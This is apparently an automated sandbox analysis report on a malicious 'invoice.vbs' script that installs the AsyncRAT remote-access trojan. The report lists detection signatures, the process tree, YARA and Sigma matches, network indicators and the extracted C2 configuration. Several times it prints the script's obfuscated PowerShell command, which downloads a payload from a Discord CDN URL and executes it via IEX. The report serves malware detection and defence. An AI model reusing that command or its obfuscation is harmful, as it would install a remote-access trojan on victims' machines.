Play interactive tour

Edit tour

Windows Analysis Report invoice.vbs

Overview

General Information

Sample Name:	invoice.vbs
Analysis ID:	458958
MD5:	8a757e0b2f51327cc27b6fdba4ffd404
SHA1:	67cfc2866f5e88bb2daf4a84de61835b940266a1
SHA256:	56073b63e9b1c977aab82d11f1bf9098a78b16f99158a95810d2d21df097e164
Tags:	vbs
Infos:
Most interesting Screenshot:

Detection

AsyncRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

VBScript performs obfuscated calls to suspicious functions

Yara detected AsyncRAT

Yara detected Powershell download and execute

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Creates an undocumented autostart registry key

Injects a PE file into a foreign processes

Obfuscated command line found

Sigma detected: Suspicious PowerShell Command Line

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Antivirus or Machine Learning detection for unpacked file

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5616 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 6080 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX'); MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

aspnet_compiler.exe (PID: 1536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

aspnet_compiler.exe (PID: 4652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "ahmed2611.linkpc.net", "Port": "6666", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "Default"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Documents\20210803\PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.201434500.000002777ABB5000.00000004.00000020.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x17e98:$s1: POWERsHELL 0x181f8:$s1: POWERsHELL 0x18588:$s1: POWERsHELL 0x18928:$s1: POWERsHELL 0x18cd8:$s1: POWERsHELL
00000001.00000002.202016822.000002777C910000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xd70:$s1: POWERsHELL
00000001.00000003.200969823.000002777ACDB000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1560:$s1: POWERsHELL
00000001.00000002.201502033.000002777ACD5000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x5182:$s1: POWERsHELL
00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: powershell.exe PID: 6080	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4652	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.powershell.exe.19fb5fc3208.8.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.powershell.exe.19fb67b2de0.7.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.powershell.exe.19fb67b2de0.7.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.powershell.exe.19fb5fc3208.8.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious PowerShell Command Line

Show sources

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6080

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6080

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000B.00000002.728657057.0000000003451000.00000004.00000001.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "ahmed2611.linkpc.net", "Port": "6666", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "Default"}

Source: 11.2.aspnet_compiler.exe.400000.0.unpack

Avira: Label: TR/Dropper.Gen

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49722 version: TLS 1.0

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.282275640.0000019FCDDE0000.00000004.00000001.sdmp
Source:	Binary string: Console.pdb source: powershell.exe, 00000003.00000002.264815805.0000019FB5840000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: ahmed2611.linkpc.net

Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49722 version: TLS 1.0

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: powershell.exe, 00000003.00000002.264636885.0000019FB5709000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.282168154.0000019FCDD54000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0
Source: powershell.exe, 00000003.00000002.264765066.0000019FB57BC000.00000004.00000001.sdmp	String found in binary or memory: http://csoft.com/pki/crls/MicRooCerAut_2
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.264881794.0000019FB58D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: powershell.exe, 00000003.00000002.276154584.0000019FB6AB4000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp, Run.vbs.3.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/833416270924742669/869658269294137374/dola2020.txt
Source: PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt.3.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.comx
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000003.216141533.0000019FB73B7000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4652, type: MEMORYSTR

System Summary:

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');			Jump to behavior

Source: invoice.vbs

Initial sample: Strings found which are bigger than 50

Source: 00000001.00000002.201434500.000002777ABB5000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.202016822.000002777C910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.200969823.000002777ACDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.201502033.000002777ACD5000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: 11.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs

Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.evad.winVBS@8/6@62/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210803

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttgqezgt.k4l.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
